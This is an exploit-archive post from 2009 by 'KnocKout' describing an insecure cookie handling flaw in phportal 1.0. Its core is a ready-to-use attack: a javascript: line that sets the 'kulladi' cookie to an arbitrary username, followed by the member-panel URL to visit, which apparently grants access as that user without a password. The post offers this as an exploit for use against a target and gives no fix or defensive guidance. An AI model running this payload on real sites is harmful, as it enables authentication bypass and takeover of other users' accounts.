[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phportal 1.0 Insecure Cookie Handling Vulnerability
# Published : 2009-06-17
# Author : KnocKout
# Previous Title : FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit
# Next Title : XOOPS <= 2.3.3 Remote File Disclosure Vulnerability (.htaccess)


########################################################
PhpPortal v1 Insecure Cookie Handling Vulnerability
########################################################

Author : KnocKout
Special Thankz : CW All users
Script : http://phportal.mertindualari.com

########################################################

Exploit;

javascript:document.cookie="kulladi=[Username];path=/";
Enter..

Go To; http://target.com/uye_paneli.php?islem=bilgilerim


########################################################

# www.Syue.com [2009-06-17]